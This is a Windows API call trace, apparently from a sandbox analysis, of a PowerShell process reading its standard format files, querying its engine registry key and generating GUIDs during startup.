	[0281.086] SetErrorMode (uMode=0x1) returned 0x1
	[0281.087] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328
	[0281.087] GetFileType (hFile=0x328) returned 0x1
	[0281.087] SetErrorMode (uMode=0x1) returned 0x1
	[0281.087] GetFileType (hFile=0x328) returned 0x1
	[0281.087] ReadFile (in: hFile=0x328, lpBuffer=0x3526138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x3526138*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0281.088] ReadFile (in: hFile=0x328, lpBuffer=0x3526138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x3526138*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0281.089] ReadFile (in: hFile=0x328, lpBuffer=0x3526138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x3526138*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0281.089] ReadFile (in: hFile=0x328, lpBuffer=0x3526138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x3526138*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0281.090] ReadFile (in: hFile=0x328, lpBuffer=0x3526138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x3526138*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0281.090] ReadFile (in: hFile=0x328, lpBuffer=0x3526138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x3526138*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0281.090] ReadFile (in: hFile=0x328, lpBuffer=0x3526138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x3526138*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0281.090] ReadFile (in: hFile=0x328, lpBuffer=0x3526138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x3526138*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0281.091] ReadFile (in: hFile=0x328, lpBuffer=0x3526138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x3526138*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0281.091] ReadFile (in: hFile=0x328, lpBuffer=0x3526138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x3526138*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0281.091] ReadFile (in: hFile=0x328, lpBuffer=0x3526138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x3526138*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0281.092] ReadFile (in: hFile=0x328, lpBuffer=0x3526138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x3526138*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0281.092] ReadFile (in: hFile=0x328, lpBuffer=0x3526138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x3526138*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0281.092] ReadFile (in: hFile=0x328, lpBuffer=0x3526138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x3526138*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0281.092] ReadFile (in: hFile=0x328, lpBuffer=0x3526138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x3526138*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0281.093] ReadFile (in: hFile=0x328, lpBuffer=0x3526138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x3526138*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0281.094] ReadFile (in: hFile=0x328, lpBuffer=0x3526138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x3526138*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0281.094] ReadFile (in: hFile=0x328, lpBuffer=0x3526138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x3526138*, lpNumberOfBytesRead=0x26d078*=0xbce, lpOverlapped=0x0) returned 1
	[0281.094] ReadFile (in: hFile=0x328, lpBuffer=0x352586e, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x352586e*, lpNumberOfBytesRead=0x26d078*=0x0, lpOverlapped=0x0) returned 1
	[0281.094] ReadFile (in: hFile=0x328, lpBuffer=0x3526138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x3526138*, lpNumberOfBytesRead=0x26d078*=0x0, lpOverlapped=0x0) returned 1
	[0281.095] CloseHandle (hObject=0x328) returned 1
	[0281.095] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0281.095] SetErrorMode (uMode=0x1) returned 0x1
	[0281.095] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d020 | out: lpFileInformation=0x26d020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0281.095] SetErrorMode (uMode=0x1) returned 0x1
	[0281.095] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0281.096] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d108 | out: phkResult=0x26d108*=0x328) returned 0x0
	[0281.096] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d08c, lpData=0x0, lpcbData=0x26d088*=0x0 | out: lpType=0x26d08c*=0x1, lpData=0x0, lpcbData=0x26d088*=0x56) returned 0x0
	[0281.096] CoTaskMemAlloc (cb=0x5a) returned 0x1b89b1e0
	[0281.096] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d05c, lpData=0x1b89b1e0, lpcbData=0x26d058*=0x56 | out: lpType=0x26d05c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d058*=0x56) returned 0x0
	[0281.096] CoTaskMemFree (pv=0x1b89b1e0) 
	[0281.096] RegCloseKey (hKey=0x328) returned 0x0
	[0281.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0281.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0283.091] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xf7f827bf, Data2=0xe0bc, Data3=0x4f05, Data4=([0]=0x9d, [1]=0x28, [2]=0x97, [3]=0xe8, [4]=0xe6, [5]=0x4e, [6]=0xd1, [7]=0xd4))) returned 0x0
	[0283.092] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xf6e7fa34, Data2=0x9080, Data3=0x48d2, Data4=([0]=0xb9, [1]=0x3a, [2]=0xf, [3]=0x10, [4]=0x58, [5]=0xe, [6]=0x2c, [7]=0x22))) returned 0x0
	[0283.095] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x95a000c4, Data2=0x45a8, Data3=0x4ee6, Data4=([0]=0x8f, [1]=0xd3, [2]=0x7e, [3]=0xe9, [4]=0xde, [5]=0x94, [6]=0xf8, [7]=0x80))) returned 0x0
	[0283.096] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xa5ba9364, Data2=0xc758, Data3=0x44c1, Data4=([0]=0xbf, [1]=0x7b, [2]=0x9a, [3]=0x22, [4]=0xa9, [5]=0xc0, [6]=0x42, [7]=0x2d))) returned 0x0
	[0283.096] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x3ec35c59, Data2=0xca16, Data3=0x4623, Data4=([0]=0x8f, [1]=0xbe, [2]=0x92, [3]=0xd6, [4]=0x6, [5]=0x12, [6]=0xf9, [7]=0x1a))) returned 0x0
	[0283.097] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xd09f8877, Data2=0x16f4, Data3=0x49d1, Data4=([0]=0x85, [1]=0xce, [2]=0x26, [3]=0x5a, [4]=0x9a, [5]=0xaf, [6]=0x73, [7]=0xd9))) returned 0x0
	[0283.097] VirtualQuery (in: lpAddress=0x26bce0, lpBuffer=0x26cba0, dwLength=0x30 | out: lpBuffer=0x26cba0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.098] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x616d56e8, Data2=0x2222, Data3=0x4ff4, Data4=([0]=0x9c, [1]=0xd0, [2]=0x39, [3]=0xd7, [4]=0xb3, [5]=0x7c, [6]=0x17, [7]=0x63))) returned 0x0
	[0283.099] VirtualQuery (in: lpAddress=0x26bce0, lpBuffer=0x26cba0, dwLength=0x30 | out: lpBuffer=0x26cba0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.100] VirtualQuery (in: lpAddress=0x26bce0, lpBuffer=0x26cba0, dwLength=0x30 | out: lpBuffer=0x26cba0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.101] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x3556ecce, Data2=0xf98e, Data3=0x4b50, Data4=([0]=0xb3, [1]=0x46, [2]=0x7f, [3]=0x59, [4]=0x29, [5]=0xdd, [6]=0x7a, [7]=0xe2))) returned 0x0
	[0283.101] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x16dcd8a3, Data2=0xc71b, Data3=0x47c1, Data4=([0]=0x93, [1]=0x43, [2]=0x85, [3]=0x38, [4]=0x18, [5]=0x34, [6]=0xa2, [7]=0xb))) returned 0x0
	[0283.101] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x767a981b, Data2=0x12bb, Data3=0x4d0e, Data4=([0]=0x91, [1]=0xb3, [2]=0x54, [3]=0x6a, [4]=0xae, [5]=0xf6, [6]=0xac, [7]=0x8f))) returned 0x0
	[0283.101] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x61efb16b, Data2=0x1eab, Data3=0x4a25, Data4=([0]=0xae, [1]=0x44, [2]=0x71, [3]=0x10, [4]=0x29, [5]=0x56, [6]=0xc9, [7]=0xa9))) returned 0x0
	[0283.101] VirtualQuery (in: lpAddress=0x26bce0, lpBuffer=0x26cba0, dwLength=0x30 | out: lpBuffer=0x26cba0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.102] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xb49c37c4, Data2=0x61cc, Data3=0x4ed3, Data4=([0]=0xb6, [1]=0x55, [2]=0xe4, [3]=0x8e, [4]=0xf, [5]=0x84, [6]=0x45, [7]=0xce))) returned 0x0
	[0283.102] VirtualQuery (in: lpAddress=0x26bce0, lpBuffer=0x26cba0, dwLength=0x30 | out: lpBuffer=0x26cba0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.102] VirtualQuery (in: lpAddress=0x26bce0, lpBuffer=0x26cba0, dwLength=0x30 | out: lpBuffer=0x26cba0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.102] VirtualQuery (in: lpAddress=0x26bce0, lpBuffer=0x26cba0, dwLength=0x30 | out: lpBuffer=0x26cba0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.102] VirtualQuery (in: lpAddress=0x26bce0, lpBuffer=0x26cba0, dwLength=0x30 | out: lpBuffer=0x26cba0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.102] VirtualQuery (in: lpAddress=0x26bce0, lpBuffer=0x26cba0, dwLength=0x30 | out: lpBuffer=0x26cba0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.102] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x95b41a12, Data2=0xecdf, Data3=0x4d6d, Data4=([0]=0xa7, [1]=0xc2, [2]=0x2f, [3]=0x23, [4]=0x82, [5]=0x72, [6]=0xc9, [7]=0xaf))) returned 0x0
	[0283.103] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x532119b5, Data2=0x395f, Data3=0x49cd, Data4=([0]=0xa6, [1]=0x1a, [2]=0x8, [3]=0x0, [4]=0x91, [5]=0xf2, [6]=0xbb, [7]=0xc7))) returned 0x0
	[0283.103] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xc07bec9e, Data2=0xbbdb, Data3=0x4527, Data4=([0]=0x85, [1]=0xde, [2]=0x14, [3]=0x6b, [4]=0xe1, [5]=0x9e, [6]=0xda, [7]=0x63))) returned 0x0
	[0283.103] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x243eddf5, Data2=0x1b1b, Data3=0x40be, Data4=([0]=0xb7, [1]=0x9f, [2]=0x5e, [3]=0x56, [4]=0x7, [5]=0xfb, [6]=0x5c, [7]=0xc6))) returned 0x0
	[0283.103] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x6b5f4daa, Data2=0xdf6e, Data3=0x49b6, Data4=([0]=0xab, [1]=0x92, [2]=0x45, [3]=0x6e, [4]=0xca, [5]=0x72, [6]=0x28, [7]=0x2f))) returned 0x0
	[0283.104] VirtualQuery (in: lpAddress=0x26bfa0, lpBuffer=0x26ce60, dwLength=0x30 | out: lpBuffer=0x26ce60*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.104] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xfbe5b4f2, Data2=0xdd05, Data3=0x4a03, Data4=([0]=0x93, [1]=0xf4, [2]=0x41, [3]=0xaf, [4]=0xab, [5]=0x77, [6]=0xc6, [7]=0x33))) returned 0x0
	[0283.104] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x63be1421, Data2=0xa8be, Data3=0x45eb, Data4=([0]=0xb4, [1]=0xb2, [2]=0xad, [3]=0x10, [4]=0xc2, [5]=0x87, [6]=0xb7, [7]=0x9e))) returned 0x0
	[0283.104] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xb5a5e147, Data2=0x631c, Data3=0x4941, Data4=([0]=0x83, [1]=0xb2, [2]=0x8a, [3]=0x31, [4]=0xe5, [5]=0x49, [6]=0xfd, [7]=0xcc))) returned 0x0
	[0283.104] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xeb9cc86c, Data2=0x794a, Data3=0x44d2, Data4=([0]=0x9b, [1]=0x27, [2]=0xc4, [3]=0x7b, [4]=0x26, [5]=0xd0, [6]=0xd2, [7]=0xd2))) returned 0x0
	[0283.105] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x4bb6e2d2, Data2=0x5173, Data3=0x4b60, Data4=([0]=0xb2, [1]=0x39, [2]=0x6, [3]=0x8c, [4]=0x27, [5]=0x6, [6]=0xf1, [7]=0xf9))) returned 0x0
	[0283.105] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x39207591, Data2=0x92ed, Data3=0x4882, Data4=([0]=0x81, [1]=0xdd, [2]=0x76, [3]=0xe9, [4]=0x70, [5]=0xdd, [6]=0x1, [7]=0xd4))) returned 0x0
	[0283.105] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xc2b47b30, Data2=0x45ff, Data3=0x43c4, Data4=([0]=0x8e, [1]=0x7e, [2]=0xe2, [3]=0xa6, [4]=0xa6, [5]=0x55, [6]=0xea, [7]=0x39))) returned 0x0
	[0283.105] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xca3260c7, Data2=0xae97, Data3=0x4b36, Data4=([0]=0x8e, [1]=0x73, [2]=0x5e, [3]=0xf7, [4]=0x1c, [5]=0xf, [6]=0x38, [7]=0x85))) returned 0x0
	[0283.105] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x8b807eb3, Data2=0xd43b, Data3=0x4e8d, Data4=([0]=0x8e, [1]=0x15, [2]=0x26, [3]=0xdc, [4]=0x98, [5]=0x8e, [6]=0x89, [7]=0x78))) returned 0x0
	[0283.106] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xf64ffbb, Data2=0x8ce4, Data3=0x4385, Data4=([0]=0xbc, [1]=0x6d, [2]=0x2, [3]=0x8f, [4]=0x80, [5]=0x0, [6]=0x54, [7]=0x8f))) returned 0x0
	[0283.106] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x22e4e772, Data2=0x62f9, Data3=0x4182, Data4=([0]=0xa2, [1]=0xcc, [2]=0x45, [3]=0x44, [4]=0x8a, [5]=0x23, [6]=0xd8, [7]=0x3b))) returned 0x0
	[0283.106] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xb460c7ba, Data2=0x1b80, Data3=0x4cfe, Data4=([0]=0xb2, [1]=0x1a, [2]=0x40, [3]=0x84, [4]=0xf9, [5]=0xf8, [6]=0x3f, [7]=0x8b))) returned 0x0
	[0283.106] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x3696a426, Data2=0xe69e, Data3=0x45ee, Data4=([0]=0xbc, [1]=0x57, [2]=0xf1, [3]=0x4, [4]=0xe8, [5]=0x3, [6]=0x9b, [7]=0x5b))) returned 0x0
	[0283.106] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x23bcf1a3, Data2=0x35be, Data3=0x4075, Data4=([0]=0xa1, [1]=0xf1, [2]=0x25, [3]=0x39, [4]=0x91, [5]=0xbe, [6]=0x96, [7]=0x7b))) returned 0x0
	[0283.107] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x355aa7d5, Data2=0x9ed, Data3=0x47d7, Data4=([0]=0x8d, [1]=0x78, [2]=0x71, [3]=0xa, [4]=0x79, [5]=0x1f, [6]=0x2e, [7]=0xc6))) returned 0x0
	[0283.107] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x16399cde, Data2=0xf88c, Data3=0x4e91, Data4=([0]=0x94, [1]=0x33, [2]=0x36, [3]=0xde, [4]=0x49, [5]=0x3f, [6]=0xb8, [7]=0xe1))) returned 0x0
	[0283.107] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xb1b7776b, Data2=0xae3, Data3=0x4ba9, Data4=([0]=0xb7, [1]=0xe2, [2]=0x87, [3]=0x17, [4]=0x7c, [5]=0xb, [6]=0xb9, [7]=0x95))) returned 0x0
	[0283.107] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xb585721b, Data2=0xd6cf, Data3=0x4d4a, Data4=([0]=0x84, [1]=0xe0, [2]=0xc4, [3]=0xf4, [4]=0x34, [5]=0x77, [6]=0x4, [7]=0x49))) returned 0x0
	[0283.107] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xf23d1a77, Data2=0xaaae, Data3=0x41ae, Data4=([0]=0xab, [1]=0xef, [2]=0xc6, [3]=0x8e, [4]=0x87, [5]=0x96, [6]=0xc7, [7]=0x5))) returned 0x0
	[0283.107] VirtualQuery (in: lpAddress=0x26bce0, lpBuffer=0x26cba0, dwLength=0x30 | out: lpBuffer=0x26cba0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.108] VirtualQuery (in: lpAddress=0x26bce0, lpBuffer=0x26cba0, dwLength=0x30 | out: lpBuffer=0x26cba0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.108] VirtualQuery (in: lpAddress=0x26bce0, lpBuffer=0x26cba0, dwLength=0x30 | out: lpBuffer=0x26cba0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.108] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xc1840dab, Data2=0x5bdb, Data3=0x413d, Data4=([0]=0xbd, [1]=0xcf, [2]=0x9, [3]=0xc7, [4]=0x16, [5]=0x2a, [6]=0x38, [7]=0xa9))) returned 0x0
	[0283.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26caf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0283.109] SetErrorMode (uMode=0x1) returned 0x1
	[0283.109] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0283.109] GetFileType (hFile=0x32c) returned 0x1
	[0283.109] SetErrorMode (uMode=0x1) returned 0x1
	[0283.109] GetFileType (hFile=0x32c) returned 0x1
	[0283.109] ReadFile (in: hFile=0x32c, lpBuffer=0x2ee18c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2ee18c8*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.110] ReadFile (in: hFile=0x32c, lpBuffer=0x2ee18c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2ee18c8*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.110] ReadFile (in: hFile=0x32c, lpBuffer=0x2ee18c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2ee18c8*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.111] ReadFile (in: hFile=0x32c, lpBuffer=0x2ee18c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2ee18c8*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.111] ReadFile (in: hFile=0x32c, lpBuffer=0x2ee18c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2ee18c8*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.111] ReadFile (in: hFile=0x32c, lpBuffer=0x2ee18c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2ee18c8*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.111] ReadFile (in: hFile=0x32c, lpBuffer=0x2ee18c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2ee18c8*, lpNumberOfBytesRead=0x26d078*=0x119, lpOverlapped=0x0) returned 1
	[0283.111] ReadFile (in: hFile=0x32c, lpBuffer=0x2ee18c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2ee18c8*, lpNumberOfBytesRead=0x26d078*=0x0, lpOverlapped=0x0) returned 1
	[0283.112] CloseHandle (hObject=0x32c) returned 1
	[0283.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0283.632] SetErrorMode (uMode=0x1) returned 0x1
